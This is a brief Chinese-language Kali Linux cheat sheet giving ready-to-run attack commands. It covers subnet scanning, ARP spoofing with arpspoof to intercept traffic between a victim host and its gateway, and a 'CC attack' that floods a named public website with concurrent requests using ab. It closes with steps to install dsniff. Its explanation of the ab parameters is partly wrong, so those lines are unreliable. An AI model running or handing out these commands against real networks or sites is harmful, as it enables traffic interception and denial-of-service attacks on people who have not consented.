
扫描网段IP
fping -g 192.168.124.53/24   
arp-scan 192.168.124.1/2
nmap -sP 192.168.124.1/24
netdiscover -i eth0 -r 192.168.124.0/24

ARP渗透
arpspoof -i eth0 -t 192.168.124.68 192.168.124.1  
                               攻击IP                  网关

CC攻击
ab -n 1000 -c 1000   https://hlynford.com/  
参数一是并发数（请求的用户量）
参数二是发送总量（请求的总次数）
（有兴趣的可以在百度上另外学习）
参数1，参数2和网站地址由自己设置，这里以 1000，1000， https://hlynford.com/bbs/ 为例：


************PS**********************
vim /etc/apt/sources.list

添加阿里镜像
deb https://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src https://mirrors.aliyun.com/kali kali-rolling main non-free contrib

更新
apt-get update

安装
apt-get install dsniff

测试
arpspoof -i eth0 -t 192.168.124.68 192.168.124.1